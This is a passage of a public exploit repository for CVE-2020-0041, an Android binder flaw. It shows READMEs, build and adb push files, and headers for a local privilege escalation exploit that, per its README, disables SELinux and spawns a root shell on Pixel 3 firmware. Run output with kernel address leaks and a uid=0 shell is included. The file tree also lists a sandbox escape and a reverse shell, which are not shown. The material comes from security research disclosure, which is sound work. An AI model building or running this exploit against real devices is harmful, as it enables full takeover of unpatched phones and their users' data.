├── README.md ├── lpe ├── Android.mk ├── Application.mk ├── Makefile ├── README.md ├── include │ ├── binder.h │ ├── binder_lookup.h │ ├── endpoint.h │ ├── exploit.h │ ├── handle.h │ ├── helpers.h │ ├── log.h │ ├── node.h │ ├── pending_node.h │ ├── realloc.h │ └── uapi_binder.h └── src │ ├── binder.c │ ├── binder_lookup.c │ ├── endpoint.c │ ├── exploit.c │ ├── helpers.c │ ├── log.c │ ├── node.c │ ├── pending_node.c │ └── realloc.c └── sandbox ├── README.md ├── index.html ├── main.diff ├── reverse_shell ├── Android.mk ├── Application.mk ├── Makefile └── src │ └── reverse_shell.c ├── serve.py └── v8.diff /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-0041 2 | 3 | This repository contains code for exploiting CVE-2020-0041, a bug we reported to Google in December 2019 and which was fixed in the Android Security Bulletin from March 2020. 4 | 5 | You can find the sandbox escape exploit in [sandbox/](sandbox/). The analysis of the bug and exploitation approach can be found at https://labs.bluefrostsecurity.de/blog/2020/03/31/cve-2020-0041-part-1-sandbox-escape/ . 6 | 7 | Similarly, you can find the privilege escalation exploit in [lpe/](lpe/). The exploitation approach for this part can be found at https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/ . 8 | -------------------------------------------------------------------------------- /lpe/Android.mk: -------------------------------------------------------------------------------- 1 | LOCAL_PATH := $(call my-dir) 2 | include $(CLEAR_VARS) 3 | LOCAL_MODULE := poc 4 | LOCAL_CFLAGS += -Iinclude -DBINDER_DEVICE="\"/dev/hwbinder\"" 5 | LOCAL_SRC_FILES := src/exploit.c src/endpoint.c src/pending_node.c src/binder.c src/log.c src/helpers.c src/binder_lookup.c src/realloc.c src/node.c 6 | 7 | include $(BUILD_EXECUTABLE) 8 | 9 | 10 | -------------------------------------------------------------------------------- /lpe/Application.mk: -------------------------------------------------------------------------------- 1 | APP_ABI := arm64-v8a 2 | APP_PLATFORM := android-24 3 | APP_BUILD_SCRIPT := Android.mk -------------------------------------------------------------------------------- /lpe/Makefile: -------------------------------------------------------------------------------- 1 | # Assume ndk-build is in the path 2 | NDK_BUILD := NDK_PROJECT_PATH=. ndk-build NDK_APPLICATION_MK=./Application.mk 3 | # Retrieve binary name from Android.mk 4 | BIN := $(shell cat Android.mk | grep LOCAL_MODULE | head -n1 | cut -d' ' -f3) 5 | 6 | BIN_PATH := libs/arm64-v8a/$(BIN) 7 | 8 | all: android 9 | 10 | $(BIN_PATH): 11 | $(NDK_BUILD) 12 | 13 | android: 14 | @echo "Building Android" 15 | $(NDK_BUILD) 16 | 17 | push: $(BIN_PATH) $(LOADER) 18 | adb push $(BIN_PATH) /data/local/tmp/$(notdir $(BIN_PATH)) 19 | 20 | shell: push 21 | adb shell /data/local/tmp/$(BIN) 22 | 23 | clean: 24 | $(NDK_BUILD) clean 25 | -adb shell rm /data/local/tmp/$(notdir $(BIN_PATH)) 26 | 27 | distclean: clean 28 | $(RM) -rf libs obj 29 | -------------------------------------------------------------------------------- /lpe/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-0041: privilege escalation exploit 2 | 3 | This folder contains the local privilege escalation exploit we wrote for CVE-2020-0041. 4 | The exploit is provided with hardcoded offsets for a Pixel 3 device running the February 5 | 2020 firmware (QQ1A.200205.002).
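Since every hardcoded offset is tied to that exact build, a small pre-flight check along these lines can abort early on any other firmware (illustrative sketch only, not part of the exploit; the helper name and the check itself are ours):

```c
#include <stdio.h>
#include <string.h>
#include <sys/system_properties.h>

/* Hypothetical guard: the hardcoded offsets only match build
 * QQ1A.200205.002, so refuse to run on anything else. */
static int check_firmware(void)
{
    char build_id[PROP_VALUE_MAX] = { 0 };

    /* ro.build.id holds the build identifier, e.g. "QQ1A.200205.002". */
    __system_property_get("ro.build.id", build_id);
    if (strcmp(build_id, "QQ1A.200205.002") != 0) {
        fprintf(stderr, "[-] build '%s' not supported, adapt the offsets first\n", build_id);
        return -1;
    }
    return 0;
}
```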
The exploit needs to be adapted before it can be 6 | run on other vulnerable devices or Pixel 3 devices with different firmware versions. 7 | 8 | The exploit disables SELinux and then launches a root shell. 9 | 10 | ## Testing the exploit 11 | 12 | The exploit can be built by simply running "make" with the Android NDK in the path. It can also 13 | be pushed to a phone attached via adb by running "make all push" (warnings removed for brevity): 14 | 15 | ``` 16 | user@laptop:~/CVE-2020-0041/lpe$ make all push 17 | Building Android 18 | NDK_PROJECT_PATH=. ndk-build NDK_APPLICATION_MK=./Application.mk 19 | make[1]: Entering directory `/home/user/CVE-2020-0041/lpe' 20 | [arm64-v8a] Compile : poc <= exploit.c 21 | [arm64-v8a] Compile : poc <= endpoint.c 22 | [arm64-v8a] Compile : poc <= pending_node.c 23 | [arm64-v8a] Compile : poc <= binder.c 24 | [arm64-v8a] Compile : poc <= log.c 25 | [arm64-v8a] Compile : poc <= helpers.c 26 | [arm64-v8a] Compile : poc <= binder_lookup.c 27 | [arm64-v8a] Compile : poc <= realloc.c 28 | [arm64-v8a] Compile : poc <= node.c 29 | [arm64-v8a] Executable : poc 30 | [arm64-v8a] Install : poc => libs/arm64-v8a/poc 31 | make[1]: Leaving directory `/home/user/CVE-2020-0041/lpe' 32 | adb push libs/arm64-v8a/poc /data/local/tmp/poc 33 | libs/arm64-v8a/poc: 1 file pushed. 4.3 MB/s (39016 bytes in 0.009s) 34 | ``` 35 | 36 | Now just run /data/local/tmp/poc from an adb shell to see the exploit running: 37 | 38 | ``` 39 | blueline:/ $ /data/local/tmp/poc 40 | [+] Mapped 200000 41 | [+] selinux_enforcing before exploit: 1 42 | [+] pipe file: 0xffffffd9c67c7700 43 | [*] file epitem at ffffffda545d7d00 44 | [*] Reallocating content of 'write8_inode' with controlled data.[DONE] 45 | [+] Overwriting 0xffffffd9c67c7720 with 0xffffffda545d7d50...[DONE] 46 | [*] Write done, should have arbitrary read now. 47 | [+] file operations: ffffff97df1af650 48 | [+] kernel base: ffffff97dd280000 49 | [*] Reallocating content of 'write8_selinux' with controlled data.[DONE] 50 | [+] Overwriting 0xffffff97dfe24000 with 0x0...[DONE] 51 | [*] init_cred: ffffff97dfc300a0 52 | [+] memstart_addr: 0xffffffe700000000 53 | [+] First level entry: ceac5003 -> next table at ffffffd9ceac5000 54 | [+] Second level entry: f173c003 -> next table at ffffffd9f173c000 55 | [+] sysctl_table_root = ffffff97dfc5a3f8 56 | [*] Reallocating content of 'write8_sysctl' with controlled data.[DONE] 57 | [+] Overwriting 0xffffffda6da8d868 with 0xffffffda49ced000...[DONE] 58 | [+] Injected sysctl node!
59 | [*] Node write8_inode, pid 7058, kaddr ffffffda0723f900 60 | [*] Replaced sendmmsg dangling reference 61 | [*] Replaced sendmmsg dangling reference 62 | [*] Replaced sendmmsg dangling reference 63 | [*] Node write8_selinux, pid 6848, kaddr ffffffd9c9fa2400 64 | [*] Replaced sendmmsg dangling reference 65 | [*] Replaced sendmmsg dangling reference 66 | [*] Replaced sendmmsg dangling reference 67 | [*] Node write8_sysctl, pid 7110, kaddr ffffffda67e7d180 68 | [*] Replaced sendmmsg dangling reference 69 | [*] Replaced sendmmsg dangling reference 70 | [*] Replaced sendmmsg dangling reference 71 | [+] Cleaned up sendmsg threads 72 | [*] epitem.next = ffffffd9c67c7720 73 | [*] epitem.prev = ffffffd9c67c77d8 74 | [*] Launching privileged shell 75 | root_by_cve-2020-0041:/ # id 76 | uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0 77 | root_by_cve-2020-0041:/ # getenforce 78 | Permissive 79 | root_by_cve-2020-0041:/ # 80 | ``` 81 | -------------------------------------------------------------------------------- /lpe/include/binder.h: -------------------------------------------------------------------------------- 1 | /* Copyright 2008 The Android Open Source Project 2 | */ 3 | 4 | #ifndef _BINDER_H_ 5 | #define _BINDER_H_ 6 | 7 | #include <stdbool.h> 8 | #include <stdint.h> 9 | #include <stddef.h> 10 | #include "uapi_binder.h" 11 | 12 | struct binder_state 13 | { 14 | int fd; 15 | void *mapped; 16 | size_t mapsize; 17 | }; 18 | 19 | struct binder_io 20 | { 21 | char *data; /* pointer to read/write from */ 22 | binder_size_t *offs; /* array of offsets */ 23 | size_t data_avail; /* bytes available in data buffer */ 24 | size_t offs_avail; /* entries available in offsets array */ 25 | 26 | char *data0; /* start of data buffer */ 27 | binder_size_t *offs0; /* start of offsets buffer */ 28 | uint32_t flags; 29 | uint32_t unused; 30 | }; 31 | 32 | struct binder_death { 33 | void (*func)(struct binder_state *bs, void *ptr); 34 | void *ptr; 35 | }; 36 | 37 | /* the one magic handle */ 38 | #define BINDER_SERVICE_MANAGER 0U 39 | 40 | #define SVC_MGR_NAME "android.os.IServiceManager" 41 | 42 | enum { 43 | /* Must match definitions in IBinder.h and IServiceManager.h */ 44 | PING_TRANSACTION = B_PACK_CHARS('_','P','N','G'), 45 | SVC_MGR_GET_SERVICE = 1, 46 | SVC_MGR_CHECK_SERVICE, 47 | SVC_MGR_ADD_SERVICE, 48 | SVC_MGR_LIST_SERVICES, 49 | SVC_MGR_GET_RANDOM, 50 | }; 51 | 52 | typedef int (*binder_handler)(struct binder_state *bs, 53 | struct binder_transaction_data *txn, 54 | struct binder_io *msg, 55 | struct binder_io *reply); 56 | 57 | struct binder_state *binder_open(const char* driver, size_t mapsize); 58 | void binder_close(struct binder_state *bs); 59 | 60 | /* initiate a blocking binder call 61 | * - returns zero on success 62 | */ 63 | int binder_call(struct binder_state *bs, 64 | struct binder_io *msg, struct binder_io *reply, 65 | uint32_t target, uint32_t code); 66 | 67 | int binder_call2(struct binder_state *bs, 68 | struct binder_io *msg, struct binder_io *reply, 69 | uint32_t target, uint32_t code, char *buffer); 70 | 71 | /* release any state associated with the binder_io 72 | * - call once any necessary data has been extracted from the 73 | * binder_io after binder_call() returns 74 | * - can safely be called even if binder_call() fails 75 | */ 76 | void binder_done(struct binder_state *bs, 77 | struct binder_io *msg, struct binder_io *reply); 78 | 79 | /* manipulate strong references */ 80 | void binder_acquire(struct binder_state *bs, uint32_t target); 81 | void binder_release(struct binder_state *bs,
uint32_t target); 82 | 83 | void binder_link_to_death(struct binder_state *bs, uint32_t target, struct binder_death *death); 84 | 85 | void binder_loop(struct binder_state *bs, binder_handler func); 86 | 87 | int binder_become_context_manager(struct binder_state *bs); 88 | 89 | /* allocate a binder_io, providing a stack-allocated working 90 | * buffer, size of the working buffer, and how many object 91 | * offset entries to reserve from the buffer 92 | */ 93 | void bio_init(struct binder_io *bio, void *data, 94 | size_t maxdata, size_t maxobjects); 95 | 96 | void bio_put_obj(struct binder_io *bio, void *ptr); 97 | void bio_put_ref(struct binder_io *bio, uint32_t handle); 98 | void bio_put_fd(struct binder_io *bio, int fd); 99 | void *bio_put_ptr(struct binder_io *bio, void *buffer, uint32_t size, uint32_t *off); 100 | void bio_put_fd_array(struct binder_io *bio, uint64_t parent, uint64_t parent_offset, int num_fds); 101 | void bio_put_uint32(struct binder_io *bio, uint32_t n); 102 | void bio_put_string16(struct binder_io *bio, const uint16_t *str); 103 | void bio_put_string16_x(struct binder_io *bio, const char *_str); 104 | 105 | uint32_t bio_get_uint32(struct binder_io *bio); 106 | uint16_t *bio_get_string16(struct binder_io *bio, size_t *sz); 107 | uint32_t bio_get_ref(struct binder_io *bio); 108 | void *bio_alloc(struct binder_io *bio, size_t size); 109 | 110 | int binder_write(struct binder_state *bs, void *data, size_t len); 111 | int binder_read(int fd, void *buffer, size_t size); 112 | int binder_transaction(struct binder_state *bs, bool one_way, uint32_t handle, void *opaque, size_t opaque_size, void *offsets, size_t offsets_size); 113 | 114 | void binder_free_buffer(struct binder_state *bs, binder_uintptr_t buffer_to_free); 115 | void binder_free_buffers(struct binder_state *bs, binder_uintptr_t buffer_to_free); 116 | 117 | 118 | 119 | #endif 120 | -------------------------------------------------------------------------------- /lpe/include/binder_lookup.h: -------------------------------------------------------------------------------- 1 | #ifndef __BINDER_LOOKUP_H 2 | 3 | #define __BINDER_LOOKUP_H 4 | 5 | int publish_handle(struct binder_state *bs, uint64_t handle, char *name); 6 | uint32_t grab_handle(struct binder_state *bs, char *name); 7 | uint32_t grab_handle_and_buffer(struct binder_state *bs, char *name, uint64_t *buffer_end); 8 | void cleanup_lookup(struct binder_state *bs); 9 | int lookup_service(struct binder_state *bs, char *name); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /lpe/include/endpoint.h: -------------------------------------------------------------------------------- 1 | #ifndef ENDPOINT_H_ 2 | # define ENDPOINT_H_ 3 | #include <pthread.h> 4 | #include <setjmp.h> 5 | struct endpoint_handle { 6 | struct endpoint_info *next; 7 | uint8_t *name; 8 | struct binder_state *bs; 9 | void *stack; 10 | pid_t pid; 11 | pthread_barrier_t barrier; 12 | int status; 13 | uint64_t client_handle; 14 | uint64_t reserved_buffer; 15 | jmp_buf env; 16 | }; 17 | 18 | 19 | 20 | typedef enum { 21 | GET_VMA_START = 0, 22 | EXCHANGE_HANDLES, 23 | ADD_PENDING_NODE, 24 | TERMINATE_PENDING_NODE, 25 | RESERVE_BUFFER, 26 | FREE_RESERVED_BUFFER, 27 | TRIGGER_DECREF, 28 | } endpoint_cmd_t; 29 | 30 | 31 | bool bootstrap_endpoint(const char *endpoint_name); 32 | bool terminate_endpoint(const char *endpoint_name); 33 | struct endpoint_handle *get_endpoints(); 34 | 35 | 36 | 37 | #endif /*!
ENDPOINT_H_ */ 38 | -------------------------------------------------------------------------------- /lpe/include/exploit.h: -------------------------------------------------------------------------------- 1 | #ifndef EXPLOIT_H_ 2 | #define EXPLOIT_H_ 3 | 4 | #include "node.h" 5 | 6 | uint64_t setup_pending_nodes(struct binder_state *bs, uint64_t endpoint_handle, pthread_t *th, uint32_t n1, uint32_t n2); 7 | 8 | #endif /*! EXPLOIT_H_ */ 9 | -------------------------------------------------------------------------------- /lpe/include/handle.h: -------------------------------------------------------------------------------- 1 | #ifndef HANDLE_H_ 2 | #define HANDLE_H_ 3 | #include <stdbool.h> 4 | #include "binder.h" 5 | 6 | bool publish_handle(struct binder_state *bs, uint64_t handle, const char *srv_name); 7 | uint64_t grab_handle(struct binder_state *bs, const char *srv_name); 8 | 9 | 10 | #endif /*! HANDLE_H_ */ 11 | -------------------------------------------------------------------------------- /lpe/include/helpers.h: -------------------------------------------------------------------------------- 1 | #ifndef HELPERS_H_ 2 | #define HELPERS_H_ 3 | 4 | bool pin_cpu(int cpu); 5 | 6 | #endif /*! HELPERS_H_ */ 7 | -------------------------------------------------------------------------------- /lpe/include/log.h: -------------------------------------------------------------------------------- 1 | #ifndef __LOG_H_ 2 | #define __LOG_H_ 3 | 4 | #include <stdio.h> 5 | #include <sys/types.h> 6 | #define ALOGE(...) printf(__VA_ARGS__) 7 | #define ALOGI(...) printf(__VA_ARGS__) 8 | ssize_t log_info(const char *format, ...); 9 | ssize_t log_err(const char *format, ...); 10 | #endif 11 | -------------------------------------------------------------------------------- /lpe/include/node.h: -------------------------------------------------------------------------------- 1 | #ifndef NODE_H_ 2 | #define NODE_H_ 3 | #include <pthread.h> 4 | #include <stdbool.h> 5 | 6 | #include "binder.h" 7 | #include "pending_node.h" 8 | 9 | struct exp_node { 10 | struct binder_state *bs; 11 | uint64_t handle; 12 | const char *endpoint_name; 13 | uint8_t name[16]; 14 | uint64_t vma_start; 15 | bool second; 16 | pthread_t *th; 17 | int idx; 18 | int max; 19 | struct pending_node *pending_nodes; 20 | int num_pending; 21 | uint64_t addr; 22 | uint64_t kaddr; 23 | int target_fd; 24 | uint64_t file_addr; 25 | int ep_fd; 26 | pid_t tid; 27 | }; 28 | 29 | /* exp_node API. */ 30 | 31 | struct exp_node *node_new(const char *name); 32 | void node_free(struct exp_node *node); 33 | bool node_reset(struct exp_node *node); 34 | 35 | /* These are the kernel-related operations. */ 36 | void node_kfree(struct exp_node *node); 37 | bool node_realloc_content(struct exp_node *node, void *data, size_t size); 38 | bool node_write8(struct exp_node *node, uint64_t what, uint64_t where); 39 | bool node_write_null(struct exp_node *node, uint64_t where); 40 | 41 | 42 | bool node_realloc(struct exp_node *node, void *content, size_t size); 43 | struct exp_node *node_create(uint8_t *endpoint_name, int target_fd); 44 | static struct exp_node *_node_create(uint8_t *endpoint_name, int target_fd); 45 | void node_destroy(struct exp_node *node); 46 | bool node_leak(struct exp_node *node, uint64_t *A, uint64_t *B); 47 | bool node_leak_addr_and_kbase(struct exp_node *node, uint64_t *text); 48 | #endif /*!
NODE_H_ */ 49 | -------------------------------------------------------------------------------- /lpe/include/pending_node.h: -------------------------------------------------------------------------------- 1 | #ifndef PENDING_NODE_H_ 2 | #define PENDING_NODE_H_ 3 | 4 | typedef enum node_state 5 | { 6 | NODE_NOT_READY, 7 | NODE_FINISHED, 8 | NODE_READY, 9 | NODE_LEAKED, 10 | NODE_FREE, 11 | } node_state; 12 | 13 | typedef struct pending_node 14 | { 15 | node_state state; 16 | struct pending_node *next; 17 | struct binder_state *bs; 18 | pthread_barrier_t barrier; /* Barrier. */ 19 | pthread_barrier_t ready; 20 | pthread_barrier_t do_barrier; 21 | pthread_barrier_t done_barrier; 22 | uint64_t uaf_buffer; /* Address of binder buffer. */ 23 | pthread_t uaf_node_th; 24 | uint64_t uaf_node; 25 | uint64_t leaked_data[2]; 26 | 27 | } pending_node; 28 | 29 | 30 | void *pending_node_thread(void *args); 31 | pthread_t add_pending_node(struct binder_state *from, uint64_t pending_node); 32 | pthread_t pending_node_create(struct binder_state *bs, uint64_t node); 33 | 34 | #endif /*! PENDING_NODE_H_ */ 35 | -------------------------------------------------------------------------------- /lpe/include/realloc.h: -------------------------------------------------------------------------------- 1 | #ifndef REALLOC_H_ 2 | #define REALLOC_H_ 3 | 4 | #define NREALLOC (0x80 * 8) 5 | #define BUFSZ 0x80 6 | 7 | void *realloc_thread(void *args); 8 | void spawn_realloc_threads(); 9 | void cleanup_realloc_threads(); 10 | void setup_realloc_buffer(void *content, size_t size); 11 | bool discard_realloc_thread(pid_t pid); 12 | 13 | 14 | #endif /*! REALLOC_H_ */ 15 | -------------------------------------------------------------------------------- /lpe/include/uapi_binder.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (C) 2008 Google, Inc. 3 | * 4 | * Based on, but no longer compatible with, the original 5 | * OpenBinder.org binder driver interface, which is: 6 | * 7 | * Copyright (c) 2005 Palmsource, Inc. 8 | * 9 | * This software is licensed under the terms of the GNU General Public 10 | * License version 2, as published by the Free Software Foundation, and 11 | * may be copied, distributed, and modified under those terms. 12 | * 13 | * This program is distributed in the hope that it will be useful, 14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | * GNU General Public License for more details. 17 | * 18 | */ 19 | 20 | #ifndef _UAPI_LINUX_BINDER_H 21 | #define _UAPI_LINUX_BINDER_H 22 | 23 | #include <linux/types.h> 24 | #include <linux/ioctl.h> 25 | #include <sys/types.h> 26 | 27 | #define B_PACK_CHARS(c1, c2, c3, c4) \ 28 | ((((c1)<<24)) | (((c2)<<16)) | (((c3)<<8)) | (c4)) 29 | #define B_TYPE_LARGE 0x85 30 | 31 | enum { 32 | BINDER_TYPE_BINDER = B_PACK_CHARS('s', 'b', '*', B_TYPE_LARGE), 33 | BINDER_TYPE_WEAK_BINDER = B_PACK_CHARS('w', 'b', '*', B_TYPE_LARGE), 34 | BINDER_TYPE_HANDLE = B_PACK_CHARS('s', 'h', '*', B_TYPE_LARGE), 35 | BINDER_TYPE_WEAK_HANDLE = B_PACK_CHARS('w', 'h', '*', B_TYPE_LARGE), 36 | BINDER_TYPE_FD = B_PACK_CHARS('f', 'd', '*', B_TYPE_LARGE), 37 | BINDER_TYPE_FDA = B_PACK_CHARS('f', 'd', 'a', B_TYPE_LARGE), 38 | BINDER_TYPE_PTR = B_PACK_CHARS('p', 't', '*', B_TYPE_LARGE), 39 | }; 40 | 41 | /** 42 | * enum flat_binder_object_shifts: shift values for flat_binder_object_flags 43 | * @FLAT_BINDER_FLAG_SCHED_POLICY_SHIFT: shift for getting scheduler policy.
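Together with FLAT_BINDER_FLAG_SCHED_POLICY_MASK defined below (a 2-bit mask shifted by this value), the policy is recovered as (flags >> FLAT_BINDER_FLAG_SCHED_POLICY_SHIFT) & 3.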
44 | * 45 | */ 46 | enum flat_binder_object_shifts { 47 | FLAT_BINDER_FLAG_SCHED_POLICY_SHIFT = 9, 48 | }; 49 | 50 | /** 51 | * enum flat_binder_object_flags - flags for use in flat_binder_object.flags 52 | */ 53 | enum flat_binder_object_flags { 54 | /** 55 | * @FLAT_BINDER_FLAG_PRIORITY_MASK: bit-mask for min scheduler priority 56 | * 57 | * These bits can be used to set the minimum scheduler priority 58 | * at which transactions into this node should run. Valid values 59 | * in these bits depend on the scheduler policy encoded in 60 | * @FLAT_BINDER_FLAG_SCHED_POLICY_MASK. 61 | * 62 | * For SCHED_NORMAL/SCHED_BATCH, the valid range is between [-20..19] 63 | * For SCHED_FIFO/SCHED_RR, the value can run between [1..99] 64 | */ 65 | FLAT_BINDER_FLAG_PRIORITY_MASK = 0xff, 66 | /** 67 | * @FLAT_BINDER_FLAG_ACCEPTS_FDS: whether the node accepts fds. 68 | */ 69 | FLAT_BINDER_FLAG_ACCEPTS_FDS = 0x100, 70 | /** 71 | * @FLAT_BINDER_FLAG_SCHED_POLICY_MASK: bit-mask for scheduling policy 72 | * 73 | * These two bits can be used to set the min scheduling policy at which 74 | * transactions on this node should run. These match the UAPI 75 | * scheduler policy values, eg: 76 | * 00b: SCHED_NORMAL 77 | * 01b: SCHED_FIFO 78 | * 10b: SCHED_RR 79 | * 11b: SCHED_BATCH 80 | */ 81 | FLAT_BINDER_FLAG_SCHED_POLICY_MASK = 82 | 3U << FLAT_BINDER_FLAG_SCHED_POLICY_SHIFT, 83 | 84 | /** 85 | * @FLAT_BINDER_FLAG_INHERIT_RT: whether the node inherits RT policy 86 | * 87 | * Only when set, calls into this node will inherit a real-time 88 | * scheduling policy from the caller (for synchronous transactions). 89 | */ 90 | FLAT_BINDER_FLAG_INHERIT_RT = 0x800, 91 | }; 92 | 93 | #ifdef BINDER_IPC_32BIT 94 | typedef __u32 binder_size_t; 95 | typedef __u32 binder_uintptr_t; 96 | #else 97 | typedef __u64 binder_size_t; 98 | typedef __u64 binder_uintptr_t; 99 | #endif 100 | 101 | /** 102 | * struct binder_object_header - header shared by all binder metadata objects. 103 | * @type: type of the object 104 | */ 105 | struct binder_object_header { 106 | __u32 type; 107 | }; 108 | 109 | /* 110 | * This is the flattened representation of a Binder object for transfer 111 | * between processes. The 'offsets' supplied as part of a binder transaction 112 | * contains offsets into the data where these structures occur. The Binder 113 | * driver takes care of re-writing the structure type and data as it moves 114 | * between processes. 115 | */ 116 | struct flat_binder_object { 117 | struct binder_object_header hdr; 118 | __u32 flags; 119 | 120 | /* 8 bytes of data. */ 121 | union { 122 | binder_uintptr_t binder; /* local object */ 123 | __u32 handle; /* remote object */ 124 | }; 125 | 126 | /* extra data associated with local object */ 127 | binder_uintptr_t cookie; 128 | }; 129 | 130 | /** 131 | * struct binder_fd_object - describes a filedescriptor to be fixed up. 
132 | * @hdr: common header structure 133 | * @pad_flags: padding to remain compatible with old userspace code 134 | * @pad_binder: padding to remain compatible with old userspace code 135 | * @fd: file descriptor 136 | * @cookie: opaque data, used by user-space 137 | */ 138 | struct binder_fd_object { 139 | struct binder_object_header hdr; 140 | __u32 pad_flags; 141 | union { 142 | binder_uintptr_t pad_binder; 143 | __u32 fd; 144 | }; 145 | 146 | binder_uintptr_t cookie; 147 | }; 148 | 149 | /* struct binder_buffer_object - object describing a userspace buffer 150 | * @hdr: common header structure 151 | * @flags: one or more BINDER_BUFFER_* flags 152 | * @buffer: address of the buffer 153 | * @length: length of the buffer 154 | * @parent: index in offset array pointing to parent buffer 155 | * @parent_offset: offset in @parent pointing to this buffer 156 | * 157 | * A binder_buffer object represents an object that the 158 | * binder kernel driver can copy verbatim to the target 159 | * address space. A buffer itself may be pointed to from 160 | * within another buffer, meaning that the pointer inside 161 | * that other buffer needs to be fixed up as well. This 162 | * can be done by setting the BINDER_BUFFER_FLAG_HAS_PARENT 163 | * flag in @flags, by setting @parent buffer to the index 164 | * in the offset array pointing to the parent binder_buffer_object, 165 | * and by setting @parent_offset to the offset in the parent buffer 166 | * at which the pointer to this buffer is located. 167 | */ 168 | struct binder_buffer_object { 169 | struct binder_object_header hdr; 170 | __u32 flags; 171 | binder_uintptr_t buffer; 172 | binder_size_t length; 173 | binder_size_t parent; 174 | binder_size_t parent_offset; 175 | }; 176 | 177 | enum { 178 | BINDER_BUFFER_FLAG_HAS_PARENT = 0x01, 179 | }; 180 | 181 | /* struct binder_fd_array_object - object describing an array of fds in a buffer 182 | * @hdr: common header structure 183 | * @pad: padding to ensure correct alignment 184 | * @num_fds: number of file descriptors in the buffer 185 | * @parent: index in offset array to buffer holding the fd array 186 | * @parent_offset: start offset of fd array in the buffer 187 | * 188 | * A binder_fd_array object represents an array of file 189 | * descriptors embedded in a binder_buffer_object. It is 190 | * different from a regular binder_buffer_object because it 191 | * describes a list of file descriptors to fix up, not an opaque 192 | * blob of memory, and hence the kernel needs to treat it differently. 193 | * 194 | * An example of how this would be used is with Android's 195 | * native_handle_t object, which is a struct with a list of integers 196 | * and a list of file descriptors. The native_handle_t struct itself 197 | * will be represented by a struct binder_buffer_objct, whereas the 198 | * embedded list of file descriptors is represented by a 199 | * struct binder_fd_array_object with that binder_buffer_object as 200 | * a parent. 201 | */ 202 | struct binder_fd_array_object { 203 | struct binder_object_header hdr; 204 | __u32 pad; 205 | binder_size_t num_fds; 206 | binder_size_t parent; 207 | binder_size_t parent_offset; 208 | }; 209 | 210 | /* 211 | * On 64-bit platforms where user code may run in 32-bits the driver must 212 | * translate the buffer (and local binder) addresses appropriately. 
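This is also why binder_size_t and binder_uintptr_t above stay __u64 unless BINDER_IPC_32BIT is defined: the width of the fields crossing the ioctl boundary does not depend on the user-space ABI.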
213 | */ 214 | 215 | struct binder_write_read { 216 | binder_size_t write_size; /* bytes to write */ 217 | binder_size_t write_consumed; /* bytes consumed by driver */ 218 | binder_uintptr_t write_buffer; 219 | binder_size_t read_size; /* bytes to read */ 220 | binder_size_t read_consumed; /* bytes consumed by driver */ 221 | binder_uintptr_t read_buffer; 222 | }; 223 | 224 | /* Use with BINDER_VERSION, driver fills in fields. */ 225 | struct binder_version { 226 | /* driver protocol version -- increment with incompatible change */ 227 | __s32 protocol_version; 228 | }; 229 | 230 | /* This is the current protocol version. */ 231 | #ifdef BINDER_IPC_32BIT 232 | #define BINDER_CURRENT_PROTOCOL_VERSION 7 233 | #else 234 | #define BINDER_CURRENT_PROTOCOL_VERSION 8 235 | #endif 236 | 237 | /* 238 | * Use with BINDER_GET_NODE_DEBUG_INFO, driver reads ptr, writes to all fields. 239 | * Set ptr to NULL for the first call to get the info for the first node, and 240 | * then repeat the call passing the previously returned value to get the next 241 | * nodes. ptr will be 0 when there are no more nodes. 242 | */ 243 | struct binder_node_debug_info { 244 | binder_uintptr_t ptr; 245 | binder_uintptr_t cookie; 246 | __u32 has_strong_ref; 247 | __u32 has_weak_ref; 248 | }; 249 | 250 | #define BINDER_WRITE_READ _IOWR('b', 1, struct binder_write_read) 251 | #define BINDER_SET_IDLE_TIMEOUT _IOW('b', 3, __s64) 252 | #define BINDER_SET_MAX_THREADS _IOW('b', 5, __u32) 253 | #define BINDER_SET_IDLE_PRIORITY _IOW('b', 6, __s32) 254 | #define BINDER_SET_CONTEXT_MGR _IOW('b', 7, __s32) 255 | #define BINDER_THREAD_EXIT _IOW('b', 8, __s32) 256 | #define BINDER_VERSION _IOWR('b', 9, struct binder_version) 257 | #define BINDER_GET_NODE_DEBUG_INFO _IOWR('b', 11, struct binder_node_debug_info) 258 | 259 | /* 260 | * NOTE: Two special error codes you should check for when calling 261 | * in to the driver are: 262 | * 263 | * EINTR -- The operation has been interrupted. This should be 264 | * handled by retrying the ioctl() until a different error code 265 | * is returned. 266 | * 267 | * ECONNREFUSED -- The driver is no longer accepting operations 268 | * from your process. That is, the process is being destroyed. 269 | * You should handle this by exiting from your process. Note 270 | * that once this error code is returned, all further calls to 271 | * the driver from any thread will return this same code. 272 | */ 273 | 274 | enum transaction_flags { 275 | TF_ONE_WAY = 0x01, /* this is a one-way call: async, no return */ 276 | TF_ROOT_OBJECT = 0x04, /* contents are the component's root object */ 277 | TF_STATUS_CODE = 0x08, /* contents are a 32-bit status code */ 278 | TF_ACCEPT_FDS = 0x10, /* allow replies with file descriptors */ 279 | }; 280 | 281 | struct binder_transaction_data { 282 | /* The first two are only used for bcTRANSACTION and brTRANSACTION, 283 | * identifying the target and contents of the transaction. 284 | */ 285 | union { 286 | /* target descriptor of command transaction */ 287 | __u32 handle; 288 | /* target descriptor of return transaction */ 289 | binder_uintptr_t ptr; 290 | } target; 291 | binder_uintptr_t cookie; /* target object cookie */ 292 | __u32 code; /* transaction command */ 293 | 294 | /* General information about the transaction.
